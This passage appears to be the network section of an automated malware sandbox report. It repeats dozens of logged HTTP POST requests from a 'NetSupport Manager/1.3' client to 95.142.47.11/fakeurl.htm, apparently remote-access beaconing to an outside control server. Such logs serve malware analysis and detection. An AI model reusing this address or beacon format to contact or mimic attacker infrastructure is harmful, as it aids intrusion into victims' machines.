                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.334424973 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.434703112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.535311937 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.634759903 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.738164902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.837976933 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.938081026 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.040298939 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.139087915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.239748001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.339700937 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.440980911 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.540745020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.642585039 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.742033958 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.846790075 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:24.948308945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.048247099 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.148740053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.249859095 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.349998951 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.450885057 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.551240921 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.652745962 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.753823042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.854829073 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:25.955698967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.055677891 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.155700922 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.256669998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.356641054 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.457683086 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.557874918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.658129930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.758697033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.859757900 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:26.960712910 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.060612917 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.160712957 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.260943890 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.361722946 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.462671041 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.562649012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.662905931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.766484022 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.866617918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:27.967725039 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.067634106 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.168637991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.268639088 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.369740009 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.469650984 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.569621086 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.669647932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.787103891 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.887775898 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:28.988612890 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:29.263010025 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:29.363622904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:29.471390963 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:29.572645903 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:29.672622919 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:29.773602962 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:29.873655081 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:29.973644972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.074642897 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.175647020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.275855064 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.376631975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.476876974 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.576859951 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
